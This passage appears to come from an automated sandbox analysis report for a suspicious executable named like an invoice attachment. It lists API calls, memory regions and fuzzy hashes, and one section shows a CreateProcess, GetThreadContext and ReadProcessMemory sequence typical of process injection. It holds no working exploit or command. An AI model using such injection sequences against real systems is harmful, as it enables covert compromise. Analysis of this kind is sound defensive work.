                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _strcat
                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\INV & BANK DETAILS.exe
                                • API String ID: 1765576173-1774656789
                                • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                APIs
                                • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Temp$FileNamePath
                                • String ID: aut
                                • API String ID: 3285503233-3010740371
                                • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                • String ID:
                                • API String ID: 1794320848-0
                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                APIs
                                • _malloc.LIBCMT ref: 0043214B
                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                • _malloc.LIBCMT ref: 0043215D
                                • _malloc.LIBCMT ref: 0043216F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _malloc$AllocateHeap
                                • String ID:
                                • API String ID: 680241177-0
                                • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                APIs
                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
                                • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
                                • CloseHandle.KERNEL32(00000000), ref: 00431E14
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleTime
                                • String ID:
                                • API String ID: 3397143404-0
                                • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
                                • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
                                APIs
                                • _free.LIBCMT ref: 0043210A
                                  • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                  • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                • _free.LIBCMT ref: 0043211D
                                • _free.LIBCMT ref: 00432130
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                APIs
                                • __wsplitpath.LIBCMT ref: 004678F7
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorLast__wsplitpath_malloc
                                • String ID:
                                • API String ID: 4163294574-0
                                • Opcode ID: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                • Opcode Fuzzy Hash: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                APIs
                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                • _strcat.LIBCMT ref: 0040F786
                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                • String ID:
                                • API String ID: 3199840319-0
                                • Opcode ID: aae4703d1a2fa28cecf8473f78117cc30b5b55eeb427a6342027b9f4f8e6d7f9
                                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                • Opcode Fuzzy Hash: aae4703d1a2fa28cecf8473f78117cc30b5b55eeb427a6342027b9f4f8e6d7f9
                                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                APIs
                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                • Opcode Fuzzy Hash: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                APIs
                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                • __lock_file.LIBCMT ref: 00414A8D
                                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                • __fclose_nolock.LIBCMT ref: 00414A98
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                • String ID:
                                • API String ID: 2800547568-0
                                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                APIs
                                • __lock_file.LIBCMT ref: 00415012
                                • __ftell_nolock.LIBCMT ref: 0041501F
                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                • String ID:
                                • API String ID: 2999321469-0
                                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                APIs
                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03CD1B15
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03CD1B39
                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03CD1B5B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1431688567.0000000003CD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3cd0000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                • Instruction ID: 4ad37a03c201188d062decfd4f14ac762451941997142877ba533898065ce0d3
                                • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                • Instruction Fuzzy Hash: 8412DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                                APIs
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • _memmove.LIBCMT ref: 0046FAF1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _malloc_memmove
                                • String ID:
                                • API String ID: 1183979061-0
                                • Opcode ID: 6b87ce75bb60bdd7e72fad3430ad80a29499585ed3d5991c813137c823989206
                                • Instruction ID: 255320ec14e83fec4e4552c633d3a07f96161bd336a5b43614f928d9f0269463
                                • Opcode Fuzzy Hash: 6b87ce75bb60bdd7e72fad3430ad80a29499585ed3d5991c813137c823989206
                                • Instruction Fuzzy Hash: E551E6722043009BD310EF65DD82F5BB399AF89704F14492FF9859B382DB39E909C79A
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: ddc86243868af8a552f03c0c468dbfcc8e923f466b3b61beb194f344b8570def
                                • Instruction ID: 6b219bc4c0bbc29583a32018d9336d0aaf9d3e1b43f092b4040c7a5c6c0e764f
                                • Opcode Fuzzy Hash: ddc86243868af8a552f03c0c468dbfcc8e923f466b3b61beb194f344b8570def
                                • Instruction Fuzzy Hash: 18415EB4500612EBC710EF56C4C156AFBB0FF48308F2088AFE5D617355DBB9A950DB86
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: 1fe3562bb0116f9a078a3649e8bb7422149ac505db6a0aa6755b6147804fc8d3
                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                • Opcode Fuzzy Hash: 1fe3562bb0116f9a078a3649e8bb7422149ac505db6a0aa6755b6147804fc8d3
                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                APIs
                                • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 0040E028
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                • Instruction ID: 77665f5636f8aa13b7259ebce8dce40215e8c2ccffea67f4db7731d49ba0d040
                                • Opcode Fuzzy Hash: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                • Instruction Fuzzy Hash: 6C319C71B007159FCB24CF6EC88496BB7F6FB84310B14CA3EE45A93740D679E9458B54
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
